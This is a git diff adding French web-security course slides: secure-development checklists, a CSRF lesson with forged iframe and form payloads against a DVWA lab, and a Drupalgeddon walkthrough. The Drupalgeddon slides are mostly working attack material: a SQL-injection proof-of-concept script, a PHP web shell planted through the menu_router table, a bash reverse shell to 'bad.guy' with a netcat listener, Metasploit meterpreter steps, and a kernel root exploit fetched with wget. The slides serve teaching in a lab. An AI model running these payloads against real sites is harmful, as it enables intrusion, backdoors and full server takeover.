+[<i class="fa fa-book"></i> La StratÃ©gie nationale pour la sÃ©curitÃ© du numÃ©rique : une rÃ©ponse aux nouveaux enjeux des usages numÃ©riques](http://www.ssi.gouv.fr/actualite/la-strategie-nationale-pour-la-securite-du-numerique-une-reponse-aux-nouveaux-enjeux-des-usages-numeriques/)
+
+Note:
+- de la com pourrie aussi [HACK ACADEMY : DE DRÃ”LES DE HACKERS AU SERVICE DE LA PRÃ‰VENTION](http://www.ssi.gouv.fr/actualite/hack-academy-de-droles-de-hackers-au-service-de-la-prevention/)
+
+
+## Autres entitÃ©s SSI franÃ§aises
+
+* [OzSSI](http://www.ssi.gouv.fr/agence/cybersecurite/ozssi/)
+  * [Zomm sur les OzSSI](http://www.ssi.gouv.fr/actualite/zoom-sur-les-ozssi/)
+* [OSSIR](http://www.ossir.org/)
+* [CLUSIF](https://www.clusif.asso.fr/)
+  * [CLUSIR RhÃ´ne Alpes](http://www.clusir-rha.fr/)
+  * CLUSIR Auvergne?
+
+
+## Best Practices / Cheat sheets / Checklists
+
+* GÃ©nÃ©raliste
+  * http://www.sans.org/critical-security-controls/
+  * [The Joel Test: 12 Steps to Better Code](http://www.joelonsoftware.com/articles/fog0000000043.html)
+* OWASP
+  * [OWASP Proactive Controls](https://www.owasp.org/index.php/OWASP_Proactive_Controls)
+* Linux
+  * https://www.sans.org/media/score/checklists/linuxchecklist.pdf
+
+
+## Best Practices / Cheat sheets / Checklists
+
+* Apache
+  * http://httpd.apache.org/docs/2.4/misc/security_tips.html
+  * http://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/
+  * http://www.tecmint.com/apache-security-tips/
+  * http://blogs.reliablepenguin.com/2012/10/09/apache-configuration-best-practicies
+
+
+## Best Practices / Cheat sheets / Checklists
+
+* Nginx
+  * http://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html
+* Wordpress
+  * http://mazenovi.github.io/blog/2015/01/28/securing-wordpress/
+* Drupal
+  * https://www.drupal.org/project/security_review
+
+
+#### Proposition d'HervÃ© Schauer
+
+[HSC Newsletter](https://www.hsc.com.vn/en/help-center/other-services/hsc-newsletter)  --  NÂ°135
+
+* Utilisez-vous systÃ©matiquement des requÃªtes SQL prÃ©parÃ©es (connues aussi sous le nom de requÃªtes paramÃ©trÃ©es) ?
+* Utilisez-vous la gestion de session d'un cadriciel/bibliothÃ¨que fiable ?
+* Encodez-vous systÃ©matiquement les valeurs venant de l'extÃ©rieur (utilisateur, base de donnÃ©es...) avant de les envoyer vers l'affichage ?
+* Utilisez-vous SSL/TLS sur la totalitÃ© de votre site ?
+
+
+#### Proposition d'HervÃ© Schauer
+
+* Stockez-vous et vÃ©rifiez-vous les mots de passe utilisateurs uniquement en les dÃ©rivant avec *sha256crypt*, *bcrypt*, *scrypt*, *pbkdf2(sha256)* ou *argon2*?
+* Ã‰vitez-vous systÃ©matiquement d'utiliser les entrÃ©es utilisateurs pour des appels systÃ¨mes ?
+* Stockez-vous les tÃ©lÃ©chargements utilisateurs vers l'application (uploads) dans un environnement restreint ?
+
+
+#### Proposition d'HervÃ© Schauer
+
+* SÃ©parez-vous les paramÃ¨tres secrets du code ?
+* Faites-vous un suivi de version de tout votre code ?
+* GÃ©rez-vous vos dÃ©pendances et leur sÃ©curitÃ© ?
+
+Note:
+- c'est le web beaucoup de gens ne savent pas ce qu'ils racontent ...
+  - faire marcher la tÃªte et ne pas totu copier / coller sur un espace de prod
+- pensez la sÃ©curitÃ© au moment du choix du design pattern
+
+
+## utiliser tls
+
+* ne jamais utiliser FTP
+  * ftps et sftp fonctionnent parfaitement
+  * rsync et scp aussi
+    * chrooter un user ssh
+      * https://stdout.cowthink.org/setup-chroot-jails-in-linux-and-only-allow-sftp/
+* gÃ©nÃ©raliser l'utilisation d'https
+  * [Google favorise les sites en HTTPS, c'est un critÃ¨re officiel du rÃ©fÃ©rencement naturel](http://www.webrankinfo.com/dossiers/conseils/https-critere-seo)
+* dÃ©sactiver les services de types POP3, IMAP, SMTP
+  * utiliser les versions SSLifiÃ©es
+
+
+#### [ISPConfig](http://www.ispconfig.org/page/home.html)
+
+![ISPConfig](images/anticiper/ispconfig.jpg "ISPConfig")
+
+[tuto d'install](https://www.howtoforge.com/tutorials/ispconfig/)
+
+Note:
+- suExec, suPHP, chrooting avec jailkit, rkhunter
+- [auto install](https://www.howtoforge.com/tutorial/ispconfig-install-script-debian/)
+
+
+## Symfony
+
+* A1  
+  * ORM (Doctrine / Propel)
+    * SQLi
+  * librairie system / Service Parameters typÃ©s
+    * Command injection
+  * namespace / service
+    * LFI / RFI
+
+
+## Symfony
+
+* A2  
+  * FOSUserBundle
+* A3
+  * twig
+    * Ã©chappe par dÃ©faut
+* A4  
+  * security.yml
+    * Firewall donnant une vue globale sur la sÃ©curitÃ© des objets
+
+
+## Symfony
+
+* A5
+  * configuration par dÃ©faut secure
+* A6
+  * [igorw/IgorwFileServeBundle](https://github.com/igorw/IgorwFileServeBundle)
+* A7
+  * systÃ¨me d'ACL
+
+
+## Symfony
+
+* A8
+  * systÃ¨me de jeton par dÃ©faut
+    * pour totue soumission de formulaire
+* A9
+  * basÃ© sur github & composer
+* A10
+  * Service Parameters typÃ©s
+
+
+## Parler sÃ©curitÃ©
+
+* Revue de code
+* Rendre les checklists collaboratives
+* Bug bounty
+  * <i class="fa fa-beer"></i> BiÃ¨res, restos, sandwichs
+  * ce que font les grands
+    * google, FB, etc ...
+* DevOps
+  * Be fullstack
+* [Discuter les modÃ¨les (exposer ou cacher)](https://en.wikipedia.org/wiki/Open-source_software_security)
+
+Note:
+- si Microsoft ouvre tout ce n'est pas un hasard c'est que ca marche
+
+
+#### Positiver
+
+![Be positive](images/anticiper/bepositive.jpg "Be positive")<!-- .element width="50%" -->
+
+Note:
+- effort supplÃ©mentairer Ã  moyen constant
+  - pas le choix sur la prÃ©sentation
+
+
+## Utiliser des outils de gestion de dÃ©pendance
+
+* Bonne pratique
+  * permet d'Ã©viter des problÃ¨mes de compatibilitÃ©s
+  * permet une mise Ã  jour globale
+  * permet un meilleur dÃ©ploiement
+* [composer](https://getcomposer.org/) (PHP)
+* [bower](http://bower.io/) (Javascript client)
+* [npm](https://www.npmjs.com/) (Javascript server)
+* [pip](https://pypi.python.org/pypi/pip) (Python)
+* [gems](https://rubygems.org/) (Ruby)
+
+
+## Analyser le code
+
+* pas d'outil miracle
+  * peut Ãªtre dans les trÃ¨s spÃ©cialisÃ©s et les trÃ¨s chers?
+* statique
+  * lecture du code
+    * grep -nR
+    * [netbeans](https://netbeans.org/downloads/)
+      * ctrl+clic
+    * [OWASP Code Review Project](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
+
+
+## Analyser le code
+
+* dynamique
+  * exÃ©cution du code
+    * [OWASP Testing Project](https://www.owasp.org/index.php/OWASP_Testing_Project)
+      * ~ Fuzzing
+    * [XDebug](http://xdebug.org/)
+    * [KCacheGrinder](http://kcachegrind.sourceforge.net/html/Home.html)
+    * [BlackFiler Profiler](https://blackfire.io/)
+
+Note:
+- les outils de gestion de version rendent services
+- long et souvent trÃ¨s spÃ©cialisÃ©
+
+
+## Tests & IntÃ©gration continue (CI)
+
+* utiliser un outil de versionning
+  * [git](https://git-scm.com/), [svn](https://subversion.apache.org/), [mercurial](https://www.mercurial-scm.org/wiki/)
+  * rÃ©trochronologie des vulnÃ©rabilitÃ©s
+* utiliser les environnements
+  * prod, dev, test, staging, deploy, ...
+* les secrets de la CI
+* [vault by HashiCorp](https://www.vaultproject.io/)
+
+Ã©vite le leak de configuration
+
+
+## Tests & IntÃ©gration continue (CI)
+
+* tester
+  * intÃ©grer la sÃ©curitÃ© au tests
+    * aspect fonctionnel
+      * [behat](http://docs.behat.org/en/v2.5/)
+      * [casperjs](http://casperjs.org/) sur la base de [phantomjs](http://phantomjs.org/)
+      * [selenium](http://www.seleniumhq.org/)
+* jouer les tests rÃ©guliÃ¨rement via la ci [gitlab](https://gitlab.com/), [jenkins](https://jenkins-ci.org/), [Travis](https://travis-ci.org/), ...
+
+
+## DÃ©ploiement logiciel
+
+* via la ci [gitlab](https://gitlab.com/), [jenkins](https://jenkins-ci.org/), [Travis](https://travis-ci.org/), ...
+* [githook](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks)
+* [capistrano](http://capistranorb.com/)
+  * [capifony](http://capifony.org/)
+    * [<i class="fa fa-github"></i> capistrano/symfony](https://github.com/capistrano/symfony)
+* [Fabric](http://www.fabfile.org/)
+* bash <3
+
+
+## filtrer
+
+* [ngnix](http://nginx.org/)
+  * permet de filtrer rapidement et efficacement
+* [Web application Firewal (WAF)](http://www.cert-ist.com/pub/files/Document_Cert-IST_000333.pdf)
+  * [mod_security](https://www.modsecurity.org/)
+    * permet entre autre de logger la mÃ©thode post facilement
+      * gare Ã  l'espace disque
+    * [<i class="fa fa-github"></i> SpiderLabs/owasp-modsecurity-crs](https://github.com/SpiderLabs/owasp-modsecurity-crs)
+      * expressions rÃ©guliÃ¨res complexes
+
+
+## Monitorer
+
+* Avoir un outil d'analyse de log
+  * permet de connaÃ®tre le bruit
+  * beaucoup d'attaques a priori
+
+
+## Etudier des pistes radicales
+
+* dÃ©porter le back office
+* utiliser la gÃ©nÃ©ration de code
+  * [<i class="fa fa-github"></i> sculpin/sculpin](https://sculpin.io)
+  * [<i class="fa fa-github"></i> getpelican/pelican](https://github.com/getpelican/pelican)
+* interdire l'upload de fichier
+* utiliser markdown (pure) pour la mise en forme
+  * ou tout autre systÃ¨me de texte enrichi
+* ne rien mettre sur le web
+
+
+## S'entrainer
+
+* jamais sur de la prod
+  * ni la vÃ´tre
+  * ni celle des concurrents
+* Challenges
+  * http://www.root-me.org/
+  * https://www.newbiecontest.org/
+  * https://github.com/ctfs
+
+
+## S'entrainer
+
+* VM
+  * http://www.bonsai-sec.com/en/research/moth.php
+  * http://sourceforge.net/projects/lampsecurity/
+  * http://hackxor.sourceforge.net/cgi-bin/index.pl
+  * http://sourceforge.net/projects/exploitcoilvuln/
+  * https://www.vulnhub.com/entry/metasploitable-1,28/
+  * http://sourceforge.net/projects/metasploitable/
+
+
+## S'entrainer
+
+* Weak apps
+  * http://sourceforge.net/projects/mutillidae/
+  * http://sechow.com/bricks/
+  * https://www.pentesterlab.com/
+  * http://hackingdojo.com/dojo-media/
+
+
+## Conclusion
+
+<div style="text-align: center">
+  ![Conseil de Jedi](images/anticiper/yoda.gif "Conseil de Jedi")
+</div>
+
+
+## Conclusion
+
+* <i class="fa fa-bullhorn"></i> une veille efficace tu maintiendras
+* <i class="fa fa-bullhorn"></i> toutes les mises Ã  jour asap tu effectueras
+* <i class="fa fa-bullhorn"></i> toutes tes entrÃ©es tu filteras
+* <i class="fa fa-bullhorn"></i> toutes tes sorties tu Ã©chapperas
+* <i class="fa fa-bullhorn"></i> par listes blanches tu rÃ©flÃ©chiras
+* <i class="fa fa-bullhorn"></i> les bonnes pratiques tu Ã©tudieras
+* <i class="fa fa-bullhorn"></i> un systÃ¨me fiable de dÃ©ploiement tu utiliseras
+* <i class="fa fa-bullhorn"></i> avec ton Ã©quipe de sÃ©curitÃ© tu parleras
+
+Note:
+- cacher n'est pas protÃ©gÃ©
diff --git a/content/slides/1337/md/csrf.md b/content/slides/1337/md/csrf.md
new file mode 100644
index 0000000000000000000000000000000000000000..74913da7617ee56f7dfe94faef9c430f9647d962
--- /dev/null
+++ b/content/slides/1337/md/csrf.md
@@ -0,0 +1,222 @@
+# CSRF
+
+## aka Cross-Site Request Forgery
+
+
+### <i class="fa fa-cogs"></i> Principe
+
+* affecte toute ressource disponible directement
+  * sans Ã©tape intermÃ©diaire
+    * avec authentification
+      * usurpation de session
+    * ou pas
+      * redirection arbitraire
+
+
+### <i class="fa fa-cogs"></i> Principe
+
+* le but est de rediriger un utilisateur vers une url
+
+  * Ã  l'insu de son plein grÃ©
+
+* pour qu'il clique tous les coups sont permis
+
+
+### <i class="fa fa-user-secret"></i> Que peut on faire?
+
+* exÃ©cuter des opÃ©rations avec les permissions d'un autre utilisateur
+* clickjacking
+* spam
+
+Note:
+- l'action avec privilÃ¨ge
+  - urls connues (CMS, ...)
+    - on espÃ¨re que l'utilisateur est loguÃ©
+- spam de commentaire
+  - urls connues (CMS, ...)
+
+
+## Mode opÃ©ratoire
+
+<div style="text-align: center">
+  ![alt text](images/csrf/csrf.png "CSRF")
+</div>
+
+Note:
+- rappel ici mail, mais aussi
+  - XSS
+  - lien dÃ©guisÃ©
+  - url shortner
+
+
+## DiffÃ©rentes techniques
+
+* Url ou formulaires forgÃ©s relayÃ©s via XSS
+* redirection arbitraire via XSS
+
+* Social engineering
+  * initulÃ© de lien malicieux
+  * url shortner
+  * le lien image dÃ©guisÃ©
+
+* Phishing
+  * par mail par exemple
+    * approche probabiliste
+
+
+## DiffÃ©rentes techniques
+
+* Modficiation de l'overlay en css
+  * likejacking ou +1jacking
+    * [ArrÃªtez de vous faire avoir sur Facebook !!! ](http://www.mycommunitymanager.fr/arretez-de-vous-faire-avoir-sur-facebook/)
+
+```css
+a#malice {
+  display: block;
+  width: 100%;
+  height: 100%;
+  position: absolute;
+  top: 0;
+  bottom: 0;
+  opacity: 0.001;
+}
+```
+
+Note:
+- XSS rÃ©flÃ©chi ou stockÃ© ca marche
+  - ya toujours un con qui clique
+- insolvable click jacking insolvable
+  - aucun moyen de distinguer les like lÃ©gitimes
+    - ils proviennet tous d'un serveur externe Ã  facebook
+      - possibilitÃ© de blacklist pour des sites rÃ©putÃ©s frauduleux
+
+
+### [CSRF stored - security low](http://dv.wa/vulnerabilities/csrf/)  
+
+url vulnÃ©rable
+
+```http
+http://dv.wa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change
+```
+
+passage de paramÃ¨tres via GET en injectant
+
+```http
+<iframe
+  src="javascript:window.location='http://dv.wa/vulnerabilities/csrf/?password_new=1337&password_conf=1337&Change=Change';"
+  height="0" width="0" style="border:0;">
+</iframe>
+```
+
+via POST avec en scriptant
+
+```http
+<form action="http://dv.wa/vulnerabilities/csrf/admin.php" method="post" id="formid"
+  onload="document.getElementById('formid').submit();">
+  <input type="hidden" name="password_new" value="1337"/>
+  <input type="hidden" name="password_conf" value="1337"/>
+</form>
+```
+
+Note:
+- analyser la requÃªte de changement de mot de passe avec burp
+- forger une url
+- forger un form
+  - injecter via XSS stored par exemple
+- problÃ¨me de l'action silencieuse et aveugle
+  - on ne sait pas sur qui ca marche
+  - si on a une liste des utilisateurs du site le brute force est un option
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* **Fausses Bonnes IdÃ©es**
+  * utiliser la mÃ©thode POST
+  * vÃ©rifier le referer (ou n'importe quelle autre en-tÃªte)
+    * [CSRF stored - security medium](http://dv.wa/vulnerabilities/csrf/)  
+* Double Submit Pattern
+  * [CSRF stored - security high](http://dv.wa/vulnerabilities/csrf/)
+
+
+## <i class="fa fa-medkit"></i> Synchronizer Token Pattern     
+
+<div style="text-align:center">
+  ![alt text](images/csrf/csrf-stp.png "CSRF")
+</div>
+
+
+## <i class="fa fa-medkit"></i> Synchronizer Token Pattern     
+
+* token de session
+  * jeton dans un formulaire OU dans l'url ET dans la session utilisateur
+    * avec Ã©ventuellement une salaison propre Ã  l'utilisateur comme l'IP par exemple
+      * on prÃ©serve ainsi le token et on cache un manque d'entropie Ã©ventuel
+
+```http
+<input type="hidden" name="csrftoken" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt">
+```
+
+
+## <i class="fa fa-medkit"></i> Synchronizer Token Pattern     
+
+* <i class="fa fa-frown-o"></i> compliquÃ© avec une utilisation massive de XMLHttpRequest
+* <i class="fa fa-frown-o"></i> possibilitÃ© de [jetons malins via fixation de session via le referer](http://voices.washingtonpost.com/securityfix/2009/07/weaponizing_web_20.html) ou de brute force
+  * utiliser des nonces pourrait Ãªtre une solution
+
+
+## <i class="fa fa-medkit"></i> [Cookie-To-Header Token](https://en.wikipedia.org/wiki/Cross-site_request_forgery#Cookie-to-Header_Token)
+
+* adaptÃ© Ã  une utilisation massive de JS
+* basÃ© sur la [Same Origin Policy](https://en.wikipedia.org/wiki/Same-origin_policy)
+
+* A l'authentification le serveur envoie un cookie contenant un jeton alÃ©atoire valable pendant toute la session de l'utilisateur
+
+```js
+Set-Cookie: Csrf-token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; expires=Thu, 23-Jul-2015 10:25:33 GMT; Max-Age=31449600; Path=/
+```
+
+
+## <i class="fa fa-medkit"></i> [Cookie-To-Header Token](https://en.wikipedia.org/wiki/Cross-site_request_forgery#Cookie-to-Header_Token)
+
+* JavaScript lit le jeton et le renvoie dans un header HTTP spÃ©cifique Ã  chaque requÃªte
+
+```js
+X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
+```
+
+* Le serveur vÃ©rifie la validitÃ© du token
+
+
+## <i class="fa fa-medkit"></i> [reCAPTCHA - Google](https://www.google.com/recaptcha/intro/index.html)
+
+[http://dvwa.com/vulnerabilities/captcha](http://dvwa.com/vulnerabilities/captcha)
+
+* Security level: low
+  * action configurÃ©e en 2 Ã©tapes
+    * Etape 1
+      * validation du captcha
+    * Etape 2
+      * exÃ©cution de l'action
+  * en modifiant le paramÃ¨tre step Ã  2 on bypass le captcha
+
+
+## <i class="fa fa-medkit"></i> [reCAPTCHA - Google](https://www.google.com/recaptcha/intro/index.html)
+
+* Security level: medium
+  * action configurÃ©e en 3 Ã©tapes
+    * Etape 1
+      * validation du captcha
+    * Etape 2
+      * Confirmation de l'action
+    * Etape 3
+      * exÃ©cution de l'action
+  * en modifiant le paramÃ¨tre step Ã  2 et en ajoutant Change=Change on bypass le captcha
+
+
+## <i class="fa fa-medkit"></i> Se prÃ©server
+
+* CÃ´tÃ© client
+  * [RequestPolicy](https://addons.mozilla.org/fr/firefox/addon/requestpolicy) protÃ¨ge mais peut empÃªcher certains sites de fonctionner
+  * [CsFire](https://addons.mozilla.org/fr/firefox/addon/csfire) protÃ¨ge un peu en enlevant toute information d'authentification pour les requÃªtes cross-site
+  * [NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript) va prÃ©munir des scripts en provenance de de sites non sÃ»rs
+  * [Self-Destructing Cookies](https://addons.mozilla.org/fr/firefox/addon/self-destructing-cookies) permet de rÃ©duire la fenÃªtre d'attaque en supprimant les cookies dÃ¨s qu'ils ne sont plus associÃ© Ã  un onglet actif
diff --git a/content/slides/1337/md/drupalgeddon.md b/content/slides/1337/md/drupalgeddon.md
new file mode 100644
index 0000000000000000000000000000000000000000..df2fdc6806aef607f80923c9084f82217cb91607
--- /dev/null
+++ b/content/slides/1337/md/drupalgeddon.md
@@ -0,0 +1,328 @@
+## Drupalgeddon<!-- .slide: data-background="images/drupalgeddon/drupalgeddon.jpg" data-background-size="135%" data-background-color="black"-->
+
+
+## systÃ¨me vulnÃ©rable
+
+* Wheezy [Debian 7.0.0 â€“ amd64 â€“ netinst](http://www.debiantutorials.com/download-debian-iso/)
+  * paramÃ¨ter le rÃ©seau [DYI - My Security Lab](http://mazenovi.github.com)
+    * le couper juste aprÃ¨s la conf du DHCP Ã   l'install
+  * Ã  l'installation
+    * surtout pas d'upgrade pour garder un kernel vulnÃ©rable
+
+** Nous disposons d'une machine vulnÃ©rable Ã  un **
+
+** [Local root exploit](http://www.tux-planet.fr/local-root-exploit-pour-les-noyaux-linux-2-6-37-a-3-8-10/) **
+
+
+## Drupal vulnÃ©rable
+
+* [drupal 7.X](https://www.drupal.org/drupal-7.31-release-notes) < 7.32 dÃ©ployÃ©, configurÃ© selon la [doc](https://www.drupal.org/node/394704)
+
+```shell
+$ HTTPDUSER=`ps axo user,comm | grep -E '[a]pache|[h]ttpd|[_]www|[w]ww-data|[n]ginx' | grep -v root | head -1 | cut -d\  -f1`
+$ chown -R $HTTPDUSER sites/default/files
+$ chmod -R 0700 sites/default/files
+```
+
+* les images [ova sont lÃ ](https://gitlab.com/mazenovi/webSec)
+
+
+## Trouver un systÃ¨me vulnÃ©rable sur le www
+
+[![shodan HQ](../privacy/images/jnarac/ie/shodan-hq.png "shodan HQ")<!-- .element: align="right" width="65%" -->](https://www.shodan.io/search?query=drupal)
+
+[![Google-Fu](images/drupalgeddon/Google-fu-chuck-norris.jpg "Google-Fu")<!-- .element: width="30%" -->](https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=drupal)
+
+
+## Trouver un systÃ¨me vulnÃ©rable sur le www
+
+* ne filtrer que les drupal vulnÃ©rables
+  * [<i class="fa fa-github"></i> Dionach/CMSMap](https://github.com/Dionach/CMSmap)
+
+```http
+$ python cmsmap.py -t http://drup.al
+...
+[H] Drupal Vulnerable to SA-CORE-2014-005
+...
+```
+
+
+## La faille
+
+* [Drupalgeddon - SA-CORE-2014-005 - Drupal core - SQL injection](https://www.drupal.org/SA-CORE-2014-005)
+  * Version: 7.x < 7.32
+  * Date: 2014-October-15
+  * Security risk: [25/25 ( Highly Critical)](https://www.drupal.org/security-team/risk-levels)
+
+
+## La faille
+
+[includes/database/database.inc](https://github.com/pressflow/7/commit/a0fee30d766a4760db96fac8aacac462e50f61b9) ligne 738
+
+```php
+foreach (array_filter($args, 'is_array') as $key => $data) {         
+  $new_keys = array();
+  foreach ($data as $i => $value) {   
+    $new_keys[$key . '_' . $i] = $value
+  }
+}
+```
+
+* $i est un index de tableau de variables HTTP
+* le contenu des clÃ©s de $new_keys est utilisÃ© comme paramÃ¨tre d'une requÃªte SQL
+  * possibilitÃ© d'injecter du code SQL dans les clÃ©s des paramÃ¨tres HTTP
+
+
+## La faille
+
+[includes/database/database.inc](https://github.com/pressflow/7/commit/a0fee30d766a4760db96fac8aacac462e50f61b9) ligne 738
+
+```php
+foreach (array_filter($args, 'is_array') as $key => $data) {         
+  $new_keys = array();
+  /* patched version begin */
+  foreach (array_values($data) as $i => $value) {
+  /* patched version end */
+    $new_keys[$key . '_' . $i] = $value
+  }
+}
+```
+
+* [array_values()](http://php.net/manual/fr/function.array-values.php) retourne les valeurs du tableau array et l'indexe de facon numÃ©rique
+
+Note:
+- combien de dev PHP?
+- combien utilisent array_values()
+- forcer le type des paramÃ¨tres est une bonne option
+- debugging et dump variable Ã  creuser
+  - code drupal compliquÃ© ou mal fait
+
+
+## [Timeline grand publique](http://www.nbn.org.uk/News/Latest-news/Drupalgeddon-response.aspx)
+
+* 16 sept. 2014 : notification Ã  Drupal
+* 15 oct. 2014 : publication du correctif
+* 29 oct. 2014 : [communication de Drupal (PSA-2014-003)](https://www.drupal.org/PSA-2014-003)
+* 3 nov. 2014 : release de deux exploits publiques
+
+
+## Timeline cÃ´tÃ© attaquant
+
+* 16 sept. 2014 : notification Ã  Drupal
+* 15 oct. 2014 : publication du correctif
+* 15 oct. 2014, 4h aprÃ¨s : exploitations en coursâ€¦
+* 16 oct. 2014 : de trÃ¨s nombreux Drupal compromisâ€¦
+
+
+## Exploitation manuelle
+
+remplacer
+
+```html
+<input id="edit-name" name="name" type="text">
+```
+
+par
+
+```html
+<input name="name[0; DELETE FROM flood;;#  ]" type="text" value="test3" />
+<input name="name[0]" type="text" value="test" />
+```
+
+![Down the rabbit hole](images/drupalgeddon/down_the_rabbit_hole.jpg "Down the rabbit hole")<!-- .element class="fragment roll-in" -->
+
+Note:
+- mettre un mot de passe
+
+
+## PoC
+
+[<i class="fa fa-github"></i> MKorostoff/drupalgeddon](https://github.com/MKorostoff/drupalgeddon)
+
+```php
+$url = $argv[1];
+$sql = $argv[2];
+$sql =   str_replace('{', '\' , CHAR(123), \'', $sql);
+$sql =   str_replace('}', '\' , CHAR(125), \'', $sql);
+$sql =   str_replace('[', '\' , CHAR(91), \'', $sql);
+$sql =   str_replace(']', '\' , CHAR(93), \'', $sql);
+$sql = urlencode($sql);
+
+//Send a request to the user login form
+$post_data = "name[0%20;".$sql.";;#%20%20]=test3&name[0]=test&pass=test";
+$post_data .= "&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
+$params = array(
+    'http' => array(
+    'method' => 'POST',
+    'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
+    'content' => $post_data
+  )
+);
+$ctx = stream_context_create($params);
+$data = file_get_contents($url . '?q=node&destination=node', 1, $ctx);
+```
+
+```shell
+$ php attack/inject-sql.php 'http&#58;//drup.al' 'DELETE FROM flood'
+```
+
+
+## Admin user
+
+* [Drupal 7 Sql Injection SA-CORE-2014-005 CVE-2014-3704](http://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/)
+
+```shell
+python drup4l_7_31_SqlInj_add_admin.py -t  http&#58;//drup.al -u 1337 -p 1337
+```
+* reprÃ©sente 26% d'utilisation de la faille
+  * industrialisÃ© pour vendre du viagra
+
+![viagra](images/drupalgeddon/viagra.jpg "viagra")<!-- .element class="fragment roll-in" -->
+
+
+## Backdoor
+
+rerÃ©sente 68% des attaques
+
+Simple backdoor shell
+
+```php
+$malicious_file_to_upload = '&lt;?php
+if(isset($_REQUEST["cmd"])){
+  echo "&lt;pre&gt;";
+  passthru($_REQUEST["cmd"]);
+  die;
+}
+phpinfo();';
+```
+
+* [passthru()](http://php.net/manual/fr/function.passthru.php)
+
+* Sexy backdoor [http://www.r57shell.net/shell/c99.txt](http://www.r57shell.net/shell/c99.txt)
+
+
+## Backdoor
+
+* Architecture Drupal
+  * menu_router
+    * un url = un callback + un tableau d'arguments sÃ©rialisÃ©s
+
+```sql
+insert into menu_router values ('backdoor','','','file_put_contents',
+$attack_payload, '','','',0,0,0,'','','','','','','',0,'hacked','',0,'');
+```
+
+Payload
+
+```php
+$attack_payload = array('sites/default/files/backdoor.php', $malicious_file_to_upload);
+$attack_payload = serialize($attack_payload);
+```
+
+[http://drup.al/backdoor](http://drup.al/backdoor)
+
+Note:
+- bien entendu on appelle pas Ã§a backdoor
+- en rÃ©alitÃ© l'exploit de Matt Korostoff marche avec un cookie
+- deux ou trois Ã©chappement sont nÃ©cessaire
+- mÃªme pas besoin crÃ©er le compte admin hein ...
+  - automatisable Ã  souhait
+
+
+## exploitation
+
+```shell
+$ php attack/exploit.php 'http&#58;//drup.al'
+```
+
+* [http://drup.al/sites/default/files/backdoor.php](http://drup.al.com/sites/default/files/backdoor.php)
+  * affiche phpinfo()
+* [http://drup.al/sites/default/files/backdoor.php?cmd=cat%20../settings.php](http://drup.al/sites/default/files/backdoor.php?cmd=cat%20../../sites/default/settings.php)
+  * affiche les paramÃ¨tres SQL
+
+
+## exploitation
+
+```shell
+nc -lvvp 1337
+```
+
+met le poste de l'attaquant en Ã©coute sur le port 1337
+
+```http
+http://drup.al/sites/default/files/backdoor.php?
+cmd=urlencode(bash -c 'bash -i >& /dev/tcp/bad.guy/1337 0>&1 ; bash');
+```
+
+en version encodÃ©e
+
+```http
+http://drup.al/sites/default/files/backdoor.php?
+cmd=bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fbad.guy%2F1337+0%3E%261+%3B+bash%27%0D%0```
+
+* connecte le serveur sur l'IP de l'attaquant
+
+Note:
+- discuter [Bind VS Reverse shell](http://www.go4expert.com/articles/difference-bind-shell-reverse-shell-t25408/)
+- Bind shell improbable
+- ICMP Reverse Shell passe par le protocole ICMP
+  - analyse des ping wireshark
+  - [Bypassing corporate firewall with reverse ssh port forwarding](https://toic.org/blog/2009/reverse-ssh-port-forwarding/)
+    - sur ma maquette ca marche aussi sur le port 80 ...
+
+
+## metasploit
+
+[exploit Metasploit](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/drupal_drupageddon.rb)
+
+```shell
+msf > use exploit/multi/http/drupal_drupageddon
+msf exploit(drupal_drupageddon) > set RHOST drup.al
+msf exploit(drupal_drupageddon) > set PAYLOAD php/meterpreter/reverse_tcp
+msf exploit(drupal_drupageddon) > set LHOST bad.guy
+msf exploit(drupal_drupageddon) > exploit
+[&#10035;] Started reverse handler on 172.16.76.145:4444
+meterpreter > shell
+whoami
+www-data
+```
+
+![YES](images/drupalgeddon/yes.jpg "YES")<!-- .element class="fragment roll-in" width="200px"-->
+
+Note:
+- l'autocomplÃ©tion avec tabulation
+- Port Ã  rerouter of course
+
+
+## escalade de privilÃ¨ges
+
+* [Local root exploit](http://www.tux-planet.fr/local-root-exploit-pour-les-noyaux-linux-2-6-37-a-3-8-10/)
+  * environ tous les 2 ans
+    * [CVE-2013-2094](https://github.com/realtalk/cve-2013-2094)
+  * fonctionne sur les archi 64bits uniquement
+  * kernel de 2.6.37 Ã  3.8.10
+
+```shell
+$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c
+$ gcc -O2 semtex.c
+$ ./a.out
+$ whoami
+```
+
+
+## W00T
+
+![w00t!!!!](images/drupalgeddon/woot.gif "w00t")<!-- .element width="100%"-->
+
+
+## MoralitÃ©
+
+* un malheur n'arrive jamais seul
+  * [c.f. loi de murphy](https://fr.wiktionary.org/wiki/loi_de_Murphy)
+* tout doit Ãªtre Ã  jour
+  * systÃ¨me, lib, cms, services, ...
+* mieux vaut s'appuyer sur des communautÃ©s
+  * rÃ©actives
+  * prÃ©occupÃ©es par la sÃ©curitÃ©
+* bien suivre les mises Ã  jour des produits
+  * et patcher asap quand nÃ©cessaire
diff --git a/content/slides/1337/md/js.md b/content/slides/1337/md/js.md
new file mode 100644
index 0000000000000000000000000000000000000000..f8eb7da6557ce28073eef8787755258f6caf7a0f
--- /dev/null
+++ b/content/slides/1337/md/js.md
@@ -0,0 +1,142 @@
+# javascript
+
+## aka ECMAScript
+
+
+## Javascript
+
+* 95 netscape livescript
+* interprÃ©teur js propre au navigateur
+  * ie s'arrÃªte de charger la page en cas d'erreur
+  * ff ou chrome essaient de continuer l'exÃ©cution
+* sensible Ã  la casse
+* asynchrone
